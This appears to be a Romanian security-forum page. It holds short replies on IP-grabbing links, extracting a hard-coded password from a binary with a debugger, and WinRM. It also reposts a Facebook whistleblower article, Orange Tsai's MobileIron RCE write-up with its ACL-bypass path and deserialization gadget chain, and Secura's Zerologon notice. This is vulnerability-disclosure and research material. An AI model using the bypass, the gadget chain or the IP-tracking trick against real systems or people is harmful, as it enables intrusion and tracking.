Nytro

Nu stiu daca este legal sau ilegal dar nu cred ca se poate direct cu un pixel/imagine pe chat deoarece Instagram, Facebook, Twitter si alte platforme au "protectie" impotriva acestor lucruri si nu browser-ul userului o sa faca request catre acel pixel/imagine ci backendul platformei. Daca chiar vrei ceva sa mearga ii trimiti un link cu ceva si un mesaj prin care convingi persoana sa il deschida. Daca face asta ii poti afla IP-ul. Acum vine intrebarea: ce faci cu IP-ul? Nu mai sunt vremurile de acum X ani in care la "whois" sa vezi adresa de acasa a cuiva. Si un IP e probabil folosit de multe persoane. Nu cred ca ajuta prea mult. Care este de fapt ideea? Adica de ce ai vrea sa faci asta? Ma gandesc la cazul in care "ai o problema" cu acea persoana si sincer solutia e mai simpla: discuti cu ea si rezolvi problema, suntem oameni.

Salut, incearca in primul rand sa deschizi aplicatia intr-un editor de text ca Notepad++ si sa te uiti prin ea, e posibil sa vezi parola acolo. Ceva mai practic ar fi sa rulezi un utilitar "strings" (Linux sau Windows) care ia automat stringurile unde poate fi si parola. Poti vedea activitatea binarului dar acea decryptare PROBABIL o sa se faca in memorie. Insa nu m-ar mira sa ruleze un binar in linie de comanda in care sa apara si parola, deci o solutie gen Process Monitor cum a mentionat si @gigiRoman ar putea fi foarte utila. Daca nu merg astea, probabil aplicatia trebuie deschisa intr-un debugger ca x64dbg. Daca e ceva mai simplu, se poate vedea lista de librarii importate (DLL-uri) si se pot pune breakpoint-uri pe functiile de deschidere Zip-uri care probabil au parola ca unul dintre parametri. Daca e linkat static e mai nasol. In principiu se poate, dar cam astia ar fi pasii de la mai simplu la mai complicat de incercat.

Deci acela e un Sandboxie bypass? Nu am vazut fisierul care s-a trimis. Conexiunile nu vad de ce ar fi limitate, nu mi se pare o problema asta. English?

WinRM e un serviciu care poate rula pe mai toate Windows-urile cu Powershell. Foloseste HTTP (nu se transmit date clear-text ci doar foloseste HTTP ca protocol) pe portul 5985 si HTTPS pe portul 5986. Acest serviciu asculta pe acele porturi si sysadminii se pot conecta, loga si executa scripturi/comenzi Powershell. Web-Proxy e folosit cand de pe un PC vrei sa te conectezi undeva pe Internet (si cum ziceam, poate fi bypassat by design daca e cel setat in Windows). Sysadmin -- WinRM --> PC pe care are treaba -- HTTP via web proxy --> Site-urile pe care intra userul acelui PC

Nu e degeaba, e o alternativa la psexec (care e detectabil). WinRM e folosit de catre sysadmin (in mod oficial) pentru managementul sistemelor Windows folosind PowerShell asa cum SSH si bash sunt folosite pe Linux. Ce face de fapt e cam acelasi lucru, creeaza un scheduled task prin care ruleaza ca SYSTEM ce vrei tu. Desigur, necesita privilegile necesare. Nu "iesi cu procese de sistem spre Internet" - oricum nu exista o astfel de limitare. In plus, la nivel de sistem de operare se poate seta un proxy global dar nu e obligatoriu ca aplicatiile (orice fel, fie ca ruleaza sub user obisnuit fie ca ruleaza ca servicii gen SYSTEM) sa tina cont de ele. Exista functii din Windows care tin automat cont de ele, dar daca o aplicatie creeaza manual un socket si il conecteaza la un IP din Internet, nu o sa tina cont de acea setare.

Da, Wordpress foloseste prepared statements (lucru care nu e valabil si pentru toate template-urile si plugin-urile), cred ca doar a fost folosit pentru teste cand a fost scris articolul, ca sa fie mai usor de inteles.

“I’ve found multiple blatant attempts by foreign national governments to abuse our platform on vast scales to mislead their own citizenry, and caused international news on multiple occasions. I have personally made decisions that affected national presidents without oversight, and taken action to enforce against so many prominent politicians globally that I’ve lost count.” “I Have Blood on My Hands”: A Whistleblower Says Facebook Ignored Global Political Manipulation A 6,600-word internal memo from a fired Facebook data scientist details how the social network knew leaders of countries around the world were using their site to manipulate voters — and failed to act. Craig Silverman BuzzFeed News Reporter Ryan Mac BuzzFeed News Reporter Pranav Dixit BuzzFeed News Reporter Posted on September 14, 2020, at 3:36 p.m. ET Facebook ignored or was slow to act on evidence that fake accounts on its platform have been undermining elections and political affairs around the world, according to an explosive memo sent by a recently fired Facebook employee and obtained by BuzzFeed News. The 6,600-word memo, written by former Facebook data scientist Sophie Zhang, is filled with concrete examples of heads of government and political parties in Azerbaijan and Honduras using fake accounts or misrepresenting themselves to sway public opinion. In countries including India, Ukraine, Spain, Brazil, Bolivia, and Ecuador, she found evidence of coordinated campaigns of varying sizes to boost or hinder political candidates or outcomes, though she did not always conclude who was behind them. “In the three years I’ve spent at Facebook, I’ve found multiple blatant attempts by foreign national governments to abuse our platform on vast scales to mislead their own citizenry, and caused international news on multiple occasions,” wrote Zhang, who declined to talk to BuzzFeed News. Her LinkedIn profile said she “worked as the data scientist for the Facebook Site Integrity fake engagement team” and dealt with “bots influencing elections and the like.” Advertisement Kenzo Tribouillard / Getty Images Facebook CEO Mark Zuckerberg in Brussels, Feb. 17, 2020. “I have personally made decisions that affected national presidents without oversight, and taken action to enforce against so many prominent politicians globally that I’ve lost count,” she wrote. Advertisement The memo is a damning account of Facebook’s failures. It’s the story of Facebook abdicating responsibility for malign activities on its platform that could affect the political fate of nations outside the United States or Western Europe. It's also the story of a junior employee wielding extraordinary moderation powers that affected millions of people without any real institutional support, and the personal torment that followed. “I know that I have blood on my hands by now,” Zhang wrote. These are some of the biggest revelations in Zhang’s memo: It took Facebook’s leaders nine months to act on a coordinated campaign “that used thousands of inauthentic assets to boost President Juan Orlando Hernandez of Honduras on a massive scale to mislead the Honduran people.” Two weeks after Facebook took action against the perpetrators in July, they returned, leading to a game of “whack-a-mole” between Zhang and the operatives behind the fake accounts, which are still active. In Azerbaijan, Zhang discovered the ruling political party “utilized thousands of inauthentic assets... to harass the opposition en masse.” Facebook began looking into the issue a year after Zhang reported it. The investigation is ongoing. Zhang and her colleagues removed “10.5 million fake reactions and fans from high-profile politicians in Brazil and the US in the 2018 elections.” In February 2019, a NATO researcher informed Facebook that "he’d obtained Russian inauthentic activity on a high-profile U.S. political figure that we didn’t catch." Zhang removed the activity, “dousing the immediate fire,” she wrote. In Ukraine, Zhang “found inauthentic scripted activity” supporting both former prime minister Yulia Tymoshenko, a pro–European Union politician and former presidential candidate, as well as Volodymyr Groysman, a former prime minister and ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” Zhang said of the current Ukrainian prime minister. Zhang discovered inauthentic activity — a Facebook term for engagement from bot accounts and coordinated manual accounts— in Bolivia and Ecuador but chose “not to prioritize it,” due to her workload. The amount of power she had as a mid-level employee to make decisions about a country’s political outcomes took a toll on her health. After becoming aware of coordinated manipulation on the Spanish Health Ministry’s Facebook page during the COVID-19 pandemic, Zhang helped find and remove 672,000 fake accounts “acting on similar targets globally” including in the US. In India, she worked to remove “a politically-sophisticated network of more than a thousand actors working to influence" the local elections taking place in Delhi in February. Facebook never publicly disclosed this network or that it had taken it down. “We’ve built specialized teams, working with leading experts, to stop bad actors from abusing our systems, resulting in the removal of more than 100 networks for coordinated inauthentic behavior," Facebook spokesperson Liz Bourgeois said in a statement. "It’s highly involved work that these teams do as their full-time remit. Working against coordinated inauthentic behavior is our priority, but we’re also addressing the problems of spam and fake engagement. We investigate each issue carefully, including those that Ms. Zhang raises, before we take action or go out and make claims publicly as a company." BuzzFeed News is not publishing Zhang’s full memo because it contains personal information. This story includes full excerpts when possible to provide appropriate context. In her post, Zhang said she did not want it to go public for fear of disrupting Facebook’s efforts to prevent problems around the upcoming 2020 US presidential election, and due to concerns about her own safety. BuzzFeed News is publishing parts of her memo that are clearly in the public interest. “I consider myself to have been put in an impossible spot – caught between my loyalties to the company and my loyalties to the world as a whole,” she said. “The last thing I want to do is distract from our efforts for the upcoming U.S. elections, yet I know this post will likely do so internally.” Zhang said she turned down a $64,000 severance package from the company to avoid signing a nondisparagement agreement. Doing so allowed her to speak out internally, and she used that freedom to reckon with the power that she had to police political speech. “There was so much violating behavior worldwide that it was left to my personal assessment of which cases to further investigate, to file tasks, and escalate for prioritization afterwards,” she wrote. That power contrasted with what she said seemed to be a lack of desire from senior leadership to protect democratic processes in smaller countries. Facebook, Zhang said, prioritized regions including the US and Western Europe, and often only acted when she repeatedly pressed the issue publicly in comments on Workplace, the company’s internal, employee-only message board. "Most of the world outside the West was effectively the Wild West with myself as the part-time dictator." “With no oversight whatsoever, I was left in a situation where I was trusted with immense influence in my spare time,” she wrote. “A manager on Strategic Response mused to myself that most of the world outside the West was effectively the Wild West with myself as the part-time dictator – he meant the statement as a compliment, but it illustrated the immense pressures upon me.” A former Facebook engineer who knew her told BuzzFeed News that Zhang was skilled at discovering fake account networks on the platform. “She's the only person in this entire field at Facebook that I ever trusted to be earnest about this work," said the engineer, who had seen a copy of Zhang’s post and asked not to be named because they no longer work at the company. “A lot of what I learned from that post was shocking even to me as someone who's often been disappointed at how the company treats its best people," they said. Zhang’s memo said the lack of institutional support and heavy stakes left her unable to sleep. She often felt responsible when civil unrest took hold in places she didn’t prioritize for investigation and action. “I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador,” she wrote. “Individually, the impact was likely small in each case, but the world is a vast place.” Still, she did not believe that the failures she observed during her two and a half years at the company were the result of bad intent by Facebook’s employees or leadership. It was a lack of resources, Zhang wrote, and the company’s tendency to focus on global activity that posed public relations risks, as opposed to electoral or civic harm. “Facebook projects an image of strength and competence to the outside world that can lend itself to such theories, but the reality is that many of our actions are slapdash and haphazard accidents,” she wrote. “We simply didn’t care enough to stop them” Zhang wrote that she was just six months into the job when she found coordinated inauthentic behavior — Facebook’s internal term for the use of multiple fake accounts to boost engagement or spread content — benefiting Honduran President Juan Orlando Hernández. Orlando Sierra / Getty Images Two children watch a television screen as Honduran President Juan Orlando Hernández speaks on June 16, 2020. Advertisement The connection to the Honduran leader was made, Zhang said, because an administrator for the president’s Facebook page had been “happily running hundreds of these fake assets without any obfuscation whatsoever in a show of extreme chutzpah.” The data scientist said she reported the operation, which involved thousands of fake accounts, to Facebook’s threat intelligence and policy review teams, both of which took months to act. “Local policy teams confirmed that President JOH’s marketing team had openly admitted to organizing the activity on his behalf,” she wrote. “Yet despite the blatantly violating nature of this activity, it took me almost a year to take down his operation.” That takedown was announced by Facebook in July 2019, but proved futile. Soon, the operation was soon back up and running, a fact Facebook has never disclosed. “They had returned within two weeks of our takedown and were back in a similar volume of users,” Zhang wrote, adding that she did a final sweep for the fake accounts on her last day at Facebook. “A year after our takedown, the activity is still live and well.” Advertisement In Azerbaijan, she found a large network of inauthentic accounts used to attack opponents of President Ilham Aliyev of Azerbaijan and his ruling New Azerbaijan Party, which uses the acronym YAP. Facebook still has not disclosed the influence campaign, according to Zhang. The operation detailed in the memo is reminiscent of those of Russia’s Internet Research Agency, a private troll farm that tried to influence the 2016 US elections, because it involved “dedicated employees who worked 9-6 Monday-Friday work weeks to create millions of comments” targeting members of the opposition and media reports seen as negative to Aliyev. “Perhaps they thought they were clever; the truth was, we simply didn’t care enough to stop them.” “Multiple official accounts for district-level divisions of the ruling YAP political party directly controlled numerous of these fake assets without any obfuscation whatsoever in another display of arrogance,” she wrote. “Perhaps they thought they were clever; the truth was, we simply didn’t care enough to stop them.” Katy Pearce, an associate professor at the University of Washington who studies social media and communication technology in Azerbaijan, told BuzzFeed News that fake Facebook accounts have been used to undermine the opposition and independent media in the country for years. “One of the big tools of authoritarian regimes is to humiliate the opposition in the mind of the public so that they're not viewed as a credible or legitimate alternative,” she told BuzzFeed News. “There's a chilling effect. Why would I post something if I know that I'm going to deal with thousands or hundreds of these comments, that I'm going to be targeted?” Peace said Zhang’s comment in the memo that Facebook “didn’t care enough to stop” the fake accounts and trolling aligns with her experience. “They have bigger fish to fry,” she said. A person who managed social media accounts for news organizations in Azerbaijan told BuzzFeed News that their pages were inundated with inauthentic Facebook comments. “We used to delete and ban them because we didn’t want people who came to our page to be discouraged and not react or comment,” said the person, who asked not to be named because they were not authorized to speak for their employer. “But since [the trolls] are employees, it’s easy for them to open new accounts.” They said Facebook has at times made things worse by removing the accounts or pages of human rights activists and other people after trolls report them. “We tried to tell Facebook that this is a real person who does important work,” but it took weeks for the page to be restored. Zhang wrote that a Facebook investigation into fake accounts and trolling in Azerbaijan is now underway, more than a year after she first reported the issue. On the day of her departure, she called it her “greatest unfinished business” to stop the fake behavior in the country. “Many others would think nothing of myself devoting this attention to the United States, but are shocked to see myself fighting for these small countries,” she wrote. “To put it simply, my methodologies were systematic globally, and I fought for Honduras and Azerbaijan because that was where I saw the most ongoing harm.” “I have blood on my hands” In other examples, Zhang revealed new information about a large-scale fake account network used to amplify and manipulate information about COVID-19, as well as a political influence operation that used fake accounts to influence 2018 elections in the US and Brazil. Some of these details were not previously disclosed by Facebook, suggesting the company’s regular takedown announcements remain selective and incomplete. Zhang said Facebook removed 672,000 “low-quality fake accounts” after press reports in April that some of the accounts had been engaging with COVID-19 content on the Spanish Health Ministry’s page. She said accounts in that network also engaged with content on US pages. Facebook did not disclose how many accounts it removed, or that those accounts engaged with content in other countries, including the US. Zhang also shared new details about the scale of inauthentic activity during the 2018 midterm elections in the US, and from Brazilian politicians that same year. “We ended up removing 10.5 million fake reactions and fans from high-profile politicians in Brazil and the U.S. in the 2018 elections – major politicians of all persuasions in Brazil, and a number of lower-level politicians in the United States,” she wrote. A September 2018 briefing about Facebook’s election work in the US and Brazil disclosed that it had acted against a network in Brazil that used “fake accounts to sow division and share disinformation,” as well as a set of groups, pages, and accounts that were “falsely amplifying engagement for financial gain.” It did not fully mention Zhang's findings. The scale of this activity — 672,000 fake accounts in one network, 10.5 million fake engagement and fans in others — indicates active fake accounts are a global problem, and are used to manipulate elections and public debate around the world. As one of the few people looking for and identifying fake accounts impacting civic activity outside of “priority” regions, Zhang struggled with the power she had been handed. “We focus upon harm and priority regions like the United States and Western Europe,” Zhang wrote, adding that “it became impossible to read the news and monitor world events without feeling the weight of my own responsibility.” In Bolivia, Zhang said she found “inauthentic activity supporting the opposition presidential candidate in 2019” and chose not to prioritize it. Months later, Bolivian politics fell into turmoil, leading to the resignation of President Evo Morales and “mass protests leading to dozens of deaths.” Juan Mabromata / Getty Images Members of leftist parties and Bolivian citizens watch as people burn an effigy of US President Donald Trump during a demonstration in support of Bolivia's overthrown president Evo Morales in front of the US embassy in Buenos Aires on November 22, 2019. Advertisement The same happened in Ecuador, according to Zhang, who “found inauthentic activity supporting the ruling government… and made the decision not to prioritize it.” The former Facebook employee then wondered how her decision led to downstream effects on how Ecuador’s government handled the COVID-19 pandemic — which has devastated the country — and if that would have been different if she'd acted. “I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador. Individually, the impact was likely small in each case, but the world is a vast place. Although I made the best decision I could based on the knowledge available at the time, ultimately I was the one who made the decision not to push more or prioritize further in each case, and I know that I have blood on my hands by now.” Zhang also uncovered issues in India, Facebook’s largest market, in the lead up to the local Delhi elections in February 2020. “I worked through sickness to take down a politically-sophisticated network of more than a thousand actors working to influence the election,” she wrote. Advertisement Last month, Facebook’s Indian operation came under scrutiny after reports in the Wall Street Journal revealed a top policy executive in the country had stopped local staffers from applying the company’s hate speech policies to ruling party politicians who posted anti-Muslim hate speech. “Haphazard Accidents” In her “spare time” in 2019, Zhang took on tasks usually reserved for product managers and investigators, searching out countries including Ukraine, Turkey, India, Indonesia, the Philippines, Australia, the United Kingdom, Taiwan, “and many many more.” Zhang said she found and took down “inauthentic scripted activity” in Ukraine that supported Yulia Tymoshenko, a complicated political figure who has been involved in controversial gas deals with Russia but taken a more pro-Western tack in her later career, as well as for former prime minister Volodymyr Groysman, an ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” she wrote. In another part of her memo, Zhang said she wanted to push back on the idea that Facebook was run by malicious people hoping to achieve a particular outcome. That was not the case, she wrote, attributing actions to “slapdash and haphazard accidents.” “Last year when we blocked users from naming the Ukraine whistleblower, we forgot to cover hashtags until I stepped in,” she wrote. Advertisement But she also remarked on Facebook’s habit of prioritizing public relations over real-world problems. “It’s an open secret within the civic integrity space that Facebook’s short-term decisions are largely motivated by PR and the potential for negative attention,” she wrote, noting that she was told directly at a 2020 summit that anything published in the New York Times or Washington Post would obtain elevated priority. “It’s why I’ve seen priorities of escalations shoot up when others start threatening to go to the press, and why I was informed by a leader in my organization that my civic work was not impactful under the rationale that if the problems were meaningful they would have attracted attention, became a press fire, and convinced the company to devote more attention to the space.” Zhang mentioned one example in February 2019, when a NATO strategic communications researcher reached out to Facebook, alerting the company that he'd "obtained" Russian inauthentic activity “on a high-profile U.S. political figure that we didn’t catch.” That researcher said they were planning on briefing Congress the next day. “I quickly investigated the case, determined what was going on, and removed the activity, dousing the immediate fire,” Zhang wrote. “Perhaps motivated by the experience, the same researcher tried the same experiment within a month or two, waiting half a year afterwards before sending the report to the press and finally causing the PR fire.” Advertisement “Human Resources Are Limited” Beyond specific examples from around the world, Zhang provided insight into the inner workings at Facebook. She criticized her team’s focus on issues related to “99% of activity that’s essentially spam.” “Overall, the focus of my organization – and most of Facebook – was on large-scale problems, an approach which fixated us on spam,” she said. “The civic aspect was discounted because of its small volume, its disproportionate impact ignored.” Zhang outlined the political processes within Facebook itself. She said the best way for her to gain attention for her work was not to go through the proper reporting channels, but to post about the issues on Facebook’s internal employee message board to build pressure. “In the office, I realized that my viewpoints weren’t respected unless I acted like an arrogant asshole.” “In the office, I realized that my viewpoints weren’t respected unless I acted like an arrogant asshole,” Zhang said. When she asked the company to do more in terms of finding and stopping malicious activity related to elections and political activity, she said she was told that “human resources are limited.” And when she was ordered to stop focusing on civic work, “I was told that Facebook would no longer have further need for my services if I refused.” Zhang was fired this month and posted her memo on her last day, even after offering to stay on through the election as an unpaid volunteer. In her goodbye, she encouraged her colleagues to remain at Facebook and to fix the company from within. “But you don’t – and shouldn’t – need to do it alone,” she wrote. “Find others who share your convictions and values to work on it together. Facebook is too big of a project for any one person to fix.” ● Sursa: https://www.buzzfeednews.com/article/craigsilverman/facebook-ignore-political-manipulation-whistleblower-memo

Da, e bun tipul asta, doar ca e cam laudaros (l-am vazut la Blackhat Asia). Si e bine de stiut ca multe lucruri le-a descoperit facand CTF-uri (atat participand cat si facand exercitii).

How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM Author: Orange Tsai This is a cross-post blog from DEVCORE. 中文版請參閱這裡 Hi, it’s a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities have been reported to the vendor and got fixed in June. After that, we kept monitoring large corporations to track the overall fixing progress and then found that Facebook didn’t keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported to their Bug Bounty program! This research is also presented at HITCON 2020. You can check the slides HERE As a Red Teamer, we are always looking for new paths to infiltrate the corporate network from outside. Just like our research in Black Hat USA last year, we demonstrated how leading SSL VPNs could be hacked and become your Virtual “Public” Network! SSL VPN is trusted to be secure and considered the only way to your private network. But, what if your trusted appliances are insecure? Based on this scenario, we would like to explore new attack surfaces on enterprise security, and we get interested in MDM, so this is the article for that! What is MDM? Mobile Device Management, also known as MDM, is an asset assessment system that makes the employees’ BYOD more manageable for enterprises. It was proposed in 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that the devices are running under the corporate policy and in a trusted environment. Enterprise could manage assets, install certificates, deploy applications and even lock/wipe devices remotely to prevent data leakage as well. UEM (Unified Endpoint Management) is a newer term relevant to MDM which has a broader definition for managed devices. Following we use MDM to represent similar products! Our target MDM, as a centralized system, can manage and control all employees’ devices. It is undoubtedly an ideal asset assessment system for a growing company. Besides, MDM must be reachable publicly to synchronize devices all over the world. A centralized and public-exposing appliance, what could be more appealing to hackers? Therefore, we have seen hackers and APT groups abusing MDM these years! Such as phishing victims to make MDM a C&C server of their mobile devices, or even compromising the corporate exposed MDM server to push malicious Trojans to all devices. You can read the report Malicious MDM: Let’s Hide This App by Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by CheckPoint CPR team for more details! From previous cases, we know that MDM is a solid target for hackers, and we would like to do research on it. There are several MDM solutions, even famous companies such as Microsoft, IBM and Apple have their own MDM solution. Which one should we start with? We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron! So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers are using that as well. We also know Facebook has exposed the MobileIron server since 2016. We have analyzed Fortune Global 500 as well, and found more than 15% using and exposing their MobileIron server to the public! Due to above reasons, it became our main target! Where to Start From past vulnerabilities, we learned there aren’t too many researchers diving into MobileIron. Perhaps the attack vector is still unknown. But we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning a pure BlackBox testing into GrayBox, or WhiteBox testing is vital. We spent lots of time searching for all kinds of information on the Internet, and ended up with an RPM package. This RPM file is supposed to be the developer’s testing package. The file is just sitting on a listable WebRoot and indexed by Google Search. Anyway, we got a file to research. The released date of the file is in early 2018. It seems a little bit old but still better than nothing! P.S. We have informed MobileIron and the sensitive files has been removed now. Finding Vulnerabilities After a painful time solving the dependency hell, we set the testing package up finally. The component is based on Java and exposed three ports: 443 - the user enrollment interface 8443 - the appliance management interface 9997 - the MobileIron device synchronization protocol (MI Protocol) All opened ports are TLS-encrypted. Apache is in the front of the web part and proxies all connections to backend, a Tomcat with Spring MVC inside. Due to the Spring MVC, it’s hard to find traditional vulnerabilities like SQL Injection or XSS from a single view. Therefore, examining the logic and architecture is our goal this time! Talking about the vulnerability, the root cause is straightforward. Tomcat exposed a Web Service that deserializes user input with Hessian format. However, this doesn’t mean we can do everything! The main effort of this article is to solve that, so please see the exploitation below. Although we know the Web Service deserializes the user input, we can not trigger it. The endpoint is located on both: User enrollment interface - https://mobileiron/mifs/services/ Management interface - https://mobileiron:8443/mics/services/ We can only touch the deserialization through the management interface because the user interface blocks the Web Service access. It’s a critical hit for us because most enterprises won’t expose their management interface to the Internet, and a management-only vulnerability is not useful to us so that we have to try harder. Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right? RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L] RewriteRule ^/mifs/services [F] MobileIron relied on Apache Rewrite Rules to block all the access to Web Service. It’s in the front of a reverse-proxy architecture, and the backend is a Java-based web server. Have you recalled something? Yes, the Breaking Parser Logic! It’s the reverse proxy attack surface I proposed in 2015, and presented at Black Hat USA 2018. This technique leverage the inconsistency between the Apache and Tomcat to bypass the ACL control and reaccess the Web Service. BTW, this excellent technique is also applied to the recently F5 BIG-IP TMUI RCE vulnerability! https://mobileiron/mifs/.;/services/someService Exploiting Vulnerabilities OK, now we have access to the deserialization wherever it’s on enrollment interface or management interface. Let’s go back to exploitations! Moritz Bechler has an awesome research which summarized the Hessian deserialization vulnerability on his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn the Hessian deserialization triggers the equals() and hashcode() while reconstructing a HashMap. It could also trigger the toString() through the XString, and the known exploit gadgets so far are: Apache XBean Caucho Resin Spring AOP ROME EqualsBean/ToStringBean In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection. Name Effect x Apache XBean JNDI Injection x Caucho Resin JNDI Injection √ Spring AOP JNDI Injection x ROME EqualsBean RCE Once we have a JNDI Injection, the rest parts of exploitations are easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh’s work, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, from Black Hat USA 2016 to get the code execution… Is that true? Since Alvaro Muñoz and Oleksandr Mirosh introduced this on Black Hat, we could say that this technique helps countless security researchers and brings Java deserialization vulnerability into a new era. However, Java finally mitigated the last JNDI/LDAP puzzle in October 2018. After that, all java version higher than 8u181, 7u191, and 6u201 can no longer get code execution through JNDI remote URL-Class loading. Therefore, if we exploit the Hessian deserialization on the latest MobileIron, we must face this problem! Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to False to prevent attackers from downloading remote URL-Class to get code executions. But only this has been prohibited. We can still manipulate the JNDI and redirect the Naming Reference to a local Java Class! The concept is a little bit similar to Return-Oriented Programming, utilizing a local existing Java Class to do further exploitations. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin in early 2019 for details. It describes the attack on POST-JNDI exploitations and how to abuse the Tomcat’s BeanFactory to populate the ELProcessor gadget to get code execution. Based on this concept, researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article: 除了 javax.el.ELProcessor，当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子，如果目标机器 classpath 中有 groovy 的库，则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用 It seems the Meta Programming exploitation in my previous Jenkins research could be used here as well. It makes the Meta Programming great again The approach is fantastic and looks feasible for us. But both gadgets ELProcessor and ParseClass are unavailable due to our outdated target libraries. Tomcat introduced the ELProcessor since 8.5, but our target is 7. As for the Groovy gadget, the target Groovy version is too old (1.5.6 from 2008) to support the Meta Programming, so we still have to find a new gadget by ourselves. We found a new gadget on GroovyShell in the end. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project! Attacking Facebook Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It’s time to hack Facebook! Aforementioned, we knew the Facebook uses MobileIron since 2016. Although the server’s index responses 403 Forbidden now, the Web Service is still accessible! Everything is ready and wait for our exploit! However, several days before our scheduled attack, we realized that there is a critical problem in our exploit. From our last time popping shell on Facebook, we noticed it blocks outbound connections due to security concerns. The outbound connection is vital for JNDI Injection because the idea is to make victims connecting to a malicious server to do further exploitations. But now, we can’t even make an outbound connection, not to mention others. So far, all attack surfaces on JNDI Injection have been closed, we have no choice but to return to Hessian deserialization. But due to the lack of available gadgets, we must discover a new one by ourselves! Before discovering a new gadget, we have to understand the existing gadgets’ root cause properly. After re-reading Moritz Bechler’s paper, a certain word interested me: Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception. A question quickly came up in my mind: Why did the author leave this word here? Although it failed with exceptions, there must have been something special so that the author write this down. Our target is running with a very old Groovy, so we are guessing that the readResolve() constrain might not have been applied to the code base yet! We compared the file groovy/runtime/MethodClosure.java between the latest and 1.5.6. $ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java > private Object readResolve() { > if (ALLOW_RESOLVE) { > return this; > } > throw new UnsupportedOperationException(); > } Yes, we are right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned CVE-2015-3253 is just for that. It’s a mitigation for the rising Java deserialization vulnerability in 2015. Since Groovy is an internally used library, developers won’t update it if there is no emergency. The outdated Groovy could also be a good case study to demonstrated how a harmless component can leave you compromised! Of course we got the shell on Facebook in the end. Here is the video: Vulnerability Report and Patch We have done all the research on March and sent the advisory to MobileIron at 4/3. The MobileIron released the patch on 6/15 and addressed three CVEs for that. You can check the official website for details! CVE-2020-15505 - Remote Code Execution CVE-2020-15506 - Authentication Bypass CVE-2020-15507 - Arbitrary File Reading After the patch has been released, we start monitoring the Internet to track the overall fixing progress. Here we check the Last-Modified header on static files so that the result is just for your information. (Unknown stands for the server closed both 443 and 8443 ports) At the same time, we keep our attentions on Facebook as well. With 15 days no-patch confirm, we finally popped a shell and report to their Bug Bounty program at 7/2! Conclusion So far, we have demonstrated a completely unauthenticated RCE on MobileIron. From how we get the firmware, find the vulnerability, and bypass the JNDI mitigation and network limitation. There are other stories, but due to the time, we have just listed topics here for those who are interested: How to take over the employees’ devices from MDM Disassemble the MI Protocol And the CVE-2020-15506, an interesting authentication bypass I hope this article could draw attention to MDM and the importance of enterprise security! Thanks for reading. Sursa: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html

[Blog] Zerologon: instantly become domain admin by subverting Netlogon cryptography (CVE-2020-1472) Blog post 11 September 2020, by Tom Tervoort, Senior Security Specialist and Ralph Moonen, Technical Director at Secura Last month, Microsoft patched a very interesting vulnerability that would allow an attacker with a foothold on your internal network to essentially become Domain Admin with one click. All that is required is for a connection to the Domain Controller to be possible from the attacker’s viewpoint. Secura's security expert Tom Tervoort previously discovered a less severe Netlogon vulnerability last year that allowed workstations to be taken over, but the attacker required a Person-in-the-Middle (PitM) position for that to work. Now, he discovered this second, much more severe (CVSS score: 10.0) vulnerability in the protocol. By forging an authentication token for specific Netlogon functionality, he was able to call a function to set the computer password of the Domain Controller to a known value. After that, the attacker can use this new password to take control over the domain controller and steal credentials of a domain admin. The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This flaw allows attackers to impersonate any computer, including the domain controller itself, and execute remote procedure calls on their behalf. Secura urges everybody to install the patch on all their domain controllers as fast as possible. Please refer to Microsoft’s advisory. We published a test tool on Github, which you can download here: https://github.com/SecuraBV/CVE-2020-1472 that can tell you whether a domain controller is vulnerable or not. If you are interested in the technical details behind this pretty unique vulnerability and how it was discovered, download the whitepaper here. For more information about the CVE, contact Secura at info@secura.com. Read more about Zerologon: CVE-2020-1472 in our whitepaper. If you have any questions, please contact us at info@secura.com. Sursa: https://www.secura.com/blog/zero-logon

